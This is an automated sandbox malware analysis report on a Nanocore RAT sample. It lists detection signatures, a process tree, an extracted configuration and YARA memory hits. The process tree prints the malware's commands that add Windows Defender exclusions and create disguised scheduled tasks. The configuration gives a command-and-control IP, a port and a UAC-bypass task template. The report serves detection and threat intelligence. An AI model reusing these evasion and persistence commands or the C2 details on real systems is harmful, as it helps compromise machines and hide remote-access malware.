Edit tour

Windows Analysis Report
nD2ozRD7MN.exe

Overview

General Information

Sample name:	nD2ozRD7MN.exe renamed because original name is a hash value
Original sample name:	8e2827146c4c433affba78c88fd685db.exe
Analysis ID:	1546575
MD5:	8e2827146c4c433affba78c88fd685db
SHA1:	de632114a70a9ad4b16ed686e48477f398531ae0
SHA256:	058e2c02b8cfb93b480ea8cfac08e967b39631a579256ebee27fb7472194c1ea
Tags:	32exe
Infos:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Nanocore RAT

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

nD2ozRD7MN.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\nD2ozRD7MN.exe" MD5: 8E2827146C4C433AFFBA78C88FD685DB)

powershell.exe (PID: 4164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nD2ozRD7MN.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\nD2ozRD7MN.exe" MD5: 8E2827146C4C433AFFBA78C88FD685DB)

schtasks.exe (PID: 7228 cmdline: "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7280 cmdline: "schtasks.exe" /create /f /tn "DNS Host Task" /xml "C:\Users\user\AppData\Local\Temp\tmpC8C1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7600 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1960 MD5: C31336C1EFC2CCB44B4326EA793040F2)

nD2ozRD7MN.exe (PID: 7288 cmdline: C:\Users\user\Desktop\nD2ozRD7MN.exe 0 MD5: 8E2827146C4C433AFFBA78C88FD685DB)

powershell.exe (PID: 7448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7504 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

nD2ozRD7MN.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\nD2ozRD7MN.exe" MD5: 8E2827146C4C433AFFBA78C88FD685DB)

dnshost.exe (PID: 7680 cmdline: "C:\Program Files (x86)\DNS Host\dnshost.exe" 0 MD5: 8E2827146C4C433AFFBA78C88FD685DB)

powershell.exe (PID: 7792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files (x86)\DNS Host\dnshost.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dnshost.exe (PID: 7800 cmdline: "C:\Program Files (x86)\DNS Host\dnshost.exe" MD5: 8E2827146C4C433AFFBA78C88FD685DB)

dnshost.exe (PID: 8060 cmdline: "C:\Program Files (x86)\DNS Host\dnshost.exe" MD5: 8E2827146C4C433AFFBA78C88FD685DB)

dnshost.exe (PID: 8108 cmdline: "C:\Program Files (x86)\DNS Host\dnshost.exe" MD5: 8E2827146C4C433AFFBA78C88FD685DB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nanocore RAT, NanoCore	Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.	APT33 The Gorgon Group	https://assets.virustotal.com/reports/2021trends.pdf https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack	https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "a376f716-2f77-4943-a431-3a3bcb53", "Group": "CAT", "Domain1": "66.63.187.113", "Domain2": "66.63.187.113", "Port": 1664, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2205:$a1: NanoCore.ClientPluginHost 0x227f:$a2: NanoCore.ClientPlugin 0x29a0:$b7: LogClientException 0x221f:$b9: IClientLoggingHost
00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x227f:$x2: NanoCore.ClientPlugin 0x2205:$x3: NanoCore.ClientPluginHost 0x2295:$i3: IClientNetwork 0x221f:$i6: IClientLoggingHost 0x223e:$i7: IClientNetworkHost 0x1f9f:$s1: ClientPlugin 0x2288:$s1: ClientPlugin
00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b0b:$a1: NanoCore.ClientPluginHost 0x5b87:$a2: NanoCore.ClientPlugin 0x6710:$b7: LogClientException 0x5b25:$b9: IClientLoggingHost
00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b0b:$x1: NanoCore.ClientPluginHost 0x5b44:$x2: IClientNetworkHost
00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b87:$x2: NanoCore.ClientPlugin 0x5b0b:$x3: NanoCore.ClientPluginHost 0x5b9d:$i3: IClientNetwork 0x5b25:$i6: IClientLoggingHost 0x5b44:$i7: IClientNetworkHost 0x57fb:$s1: ClientPlugin 0x5b90:$s1: ClientPlugin 0x6cf4:$s3: IPAddress
00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x10c5d:$a1: NanoCore.ClientPluginHost 0x10c1d:$a2: NanoCore.ClientPlugin 0x12b76:$b1: get_BuilderSettings 0x10a79:$b2: ClientLoaderForm.resources 0x12296:$b3: PluginCommand 0x10c4e:$b4: IClientAppHost 0x1b0ce:$b5: GetBlockHash 0x131ce:$b6: AddHostEntry 0x16ec1:$b7: LogClientException 0x1313b:$b8: PipeExists 0x10c87:$b9: IClientLoggingHost
00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x109c5:$a: NanoCore 0x109d5:$a: NanoCore 0x10c09:$a: NanoCore 0x10c1d:$a: NanoCore 0x10c5d:$a: NanoCore 0x10a24:$b: ClientPlugin 0x10c26:$b: ClientPlugin 0x10c66:$b: ClientPlugin 0x10b4b:$c: ProjectData 0x11552:$d: DESCrypto 0x18f1e:$e: KeepAlive 0x16f0c:$g: LogClientMessage 0x13107:$i: get_Connected 0x11888:$j: #=q 0x118b8:$j: #=q 0x118d4:$j: #=q 0x11904:$j: #=q 0x11920:$j: #=q 0x1193c:$j: #=q 0x1196c:$j: #=q 0x11988:$j: #=q
00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10c5d:$x1: NanoCore.ClientPluginHost 0x10c9a:$x2: IClientNetworkHost 0x147cd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x109c5:$v1: NanoCore Client 0x109d5:$v1: NanoCore Client 0x12296:$v2: PluginCommand 0x1227e:$v3: CommandType
00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x39eb:$a1: NanoCore.ClientPluginHost 0x3a8b:$a2: NanoCore.ClientPlugin 0x47e1:$b7: LogClientException 0x3a05:$b9: IClientLoggingHost
00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3a8b:$x2: NanoCore.ClientPlugin 0x39eb:$x3: NanoCore.ClientPluginHost 0x3aa1:$i3: IClientNetwork 0x3a43:$i5: IClientDataHost 0x3a05:$i6: IClientLoggingHost 0x3a24:$i7: IClientNetworkHost 0x426c:$i9: IClientNameObjectCollection 0x3741:$s1: ClientPlugin 0x3a94:$s1: ClientPlugin 0x4680:$s2: EndPoint 0x4371:$s3: IPAddress 0x3c83:$s4: IPEndPoint 0x43a3:$s7: get_Connected
00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x350b:$a1: NanoCore.ClientPluginHost 0x34e2:$a2: NanoCore.ClientPlugin 0x5854:$b7: LogClientException 0x34f8:$b9: IClientLoggingHost
00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x34e2:$x2: NanoCore.ClientPlugin 0x350b:$x3: NanoCore.ClientPluginHost 0x34d3:$i3: IClientNetwork 0x34f8:$i6: IClientLoggingHost 0x3525:$i7: IClientNetworkHost 0x334e:$s1: ClientPlugin 0x34eb:$s1: ClientPlugin
00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4bbb:$a1: NanoCore.ClientPluginHost 0x4b96:$a2: NanoCore.ClientPlugin 0x8558:$b1: get_BuilderSettings 0x4bac:$b4: IClientAppHost
00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x4b96:$x2: NanoCore.ClientPlugin 0x4bbb:$x3: NanoCore.ClientPluginHost 0x4b87:$i3: IClientNetwork 0x4bac:$i4: IClientAppHost 0x4bd5:$i5: IClientDataHost 0x4be5:$i7: IClientNetworkHost 0x4bf8:$i9: IClientNameObjectCollection 0x4c1d:$i10: IClientReadOnlyNameObjectCollection 0x49ce:$s1: ClientPlugin 0x4b9f:$s1: ClientPlugin
00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x20013:$a1: NanoCore.ClientPluginHost 0x1ffea:$a2: NanoCore.ClientPlugin 0x2503e:$b7: LogClientException 0x20000:$b9: IClientLoggingHost
00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost
00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b99:$a1: NanoCore.ClientPluginHost 0x5b70:$a2: NanoCore.ClientPlugin 0x5b86:$b9: IClientLoggingHost
00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b70:$x2: NanoCore.ClientPlugin 0x5b99:$x3: NanoCore.ClientPluginHost 0x5b61:$i3: IClientNetwork 0x5b86:$i6: IClientLoggingHost 0x5bb3:$i7: IClientNetworkHost 0x59d4:$s1: ClientPlugin 0x5b79:$s1: ClientPlugin 0x5e84:$s2: EndPoint 0x5e8d:$s3: IPAddress 0x5e97:$s4: IPEndPoint
00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x59eb:$a1: NanoCore.ClientPluginHost 0x5ad5:$a2: NanoCore.ClientPlugin 0x732e:$b7: LogClientException 0x6941:$b8: PipeExists 0x5a05:$b9: IClientLoggingHost
00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5ad5:$x2: NanoCore.ClientPlugin 0x59eb:$x3: NanoCore.ClientPluginHost 0x5aeb:$i3: IClientNetwork 0x5a24:$i5: IClientDataHost 0x5a05:$i6: IClientLoggingHost 0x5b48:$i7: IClientNetworkHost 0x5a43:$i8: IClientUIHost 0x6955:$i9: IClientNameObjectCollection 0x54fc:$s1: ClientPlugin 0x5ade:$s1: ClientPlugin 0x6971:$s6: get_ClientSettings
00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1f1db:$a1: NanoCore.ClientPluginHost 0x1f1b2:$a2: NanoCore.ClientPlugin 0x24206:$b7: LogClientException 0x1f1c8:$b9: IClientLoggingHost
00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1f1b2:$x2: NanoCore.ClientPlugin 0x1f1db:$x3: NanoCore.ClientPluginHost 0x1f1a3:$i3: IClientNetwork 0x1f1c8:$i6: IClientLoggingHost 0x1f1f5:$i7: IClientNetworkHost 0x1f208:$i8: IClientUIHost 0x1ef12:$s1: ClientPlugin 0x1f1bb:$s1: ClientPlugin
00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5fee:$a1: NanoCore.ClientPluginHost 0x5fc9:$a2: NanoCore.ClientPlugin 0x5fdf:$b4: IClientAppHost 0xa4ce:$b7: LogClientException 0x6018:$b9: IClientLoggingHost
00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5fc9:$x2: NanoCore.ClientPlugin 0x5fee:$x3: NanoCore.ClientPluginHost 0x5fba:$i3: IClientNetwork 0x5fdf:$i4: IClientAppHost 0x6008:$i5: IClientDataHost 0x6018:$i6: IClientLoggingHost 0x602b:$i7: IClientNetworkHost 0x603e:$i8: IClientUIHost 0x604c:$i9: IClientNameObjectCollection 0x5d70:$s1: ClientPlugin 0x5fd2:$s1: ClientPlugin
0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xff8d:$a1: NanoCore.ClientPluginHost 0xff4d:$a2: NanoCore.ClientPlugin 0x11ea6:$b1: get_BuilderSettings 0xfda9:$b2: ClientLoaderForm.resources 0x115c6:$b3: PluginCommand 0xff7e:$b4: IClientAppHost 0x1a3fe:$b5: GetBlockHash 0x124fe:$b6: AddHostEntry 0x161f1:$b7: LogClientException 0x1246b:$b8: PipeExists 0xffb7:$b9: IClientLoggingHost
0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xfcf5:$v1: NanoCore Client 0xfd05:$v1: NanoCore Client 0x115c6:$v2: PluginCommand 0x115ae:$v3: CommandType
00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1075d:$a1: NanoCore.ClientPluginHost 0x4317d:$a1: NanoCore.ClientPluginHost 0x1071d:$a2: NanoCore.ClientPlugin 0x4313d:$a2: NanoCore.ClientPlugin 0x12676:$b1: get_BuilderSettings 0x45096:$b1: get_BuilderSettings 0x10579:$b2: ClientLoaderForm.resources 0x42f99:$b2: ClientLoaderForm.resources 0x11d96:$b3: PluginCommand 0x447b6:$b3: PluginCommand 0x1074e:$b4: IClientAppHost 0x4316e:$b4: IClientAppHost 0x1abce:$b5: GetBlockHash 0x4d5ee:$b5: GetBlockHash 0x12cce:$b6: AddHostEntry 0x456ee:$b6: AddHostEntry 0x169c1:$b7: LogClientException 0x493e1:$b7: LogClientException 0x12c3b:$b8: PipeExists 0x4565b:$b8: PipeExists 0x10787:$b9: IClientLoggingHost
00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x104c5:$a: NanoCore 0x104d5:$a: NanoCore 0x10709:$a: NanoCore 0x1071d:$a: NanoCore 0x1075d:$a: NanoCore 0x42ee5:$a: NanoCore 0x42ef5:$a: NanoCore 0x43129:$a: NanoCore 0x4313d:$a: NanoCore 0x4317d:$a: NanoCore 0x10524:$b: ClientPlugin 0x10726:$b: ClientPlugin 0x10766:$b: ClientPlugin 0x42f44:$b: ClientPlugin 0x43146:$b: ClientPlugin 0x43186:$b: ClientPlugin 0x1064b:$c: ProjectData 0x4306b:$c: ProjectData 0x11052:$d: DESCrypto 0x43a72:$d: DESCrypto 0x18a1e:$e: KeepAlive
00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1075d:$x1: NanoCore.ClientPluginHost 0x4317d:$x1: NanoCore.ClientPluginHost 0x1079a:$x2: IClientNetworkHost 0x431ba:$x2: IClientNetworkHost 0x142cd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46ced:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x104c5:$v1: NanoCore Client 0x104d5:$v1: NanoCore Client 0x42ee5:$v1: NanoCore Client 0x42ef5:$v1: NanoCore Client 0x11d96:$v2: PluginCommand 0x447b6:$v2: PluginCommand 0x11d7e:$v3: CommandType 0x4479e:$v3: CommandType
00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x16e3:$a1: NanoCore.ClientPluginHost 0x175f:$a2: NanoCore.ClientPlugin 0x16fd:$b9: IClientLoggingHost
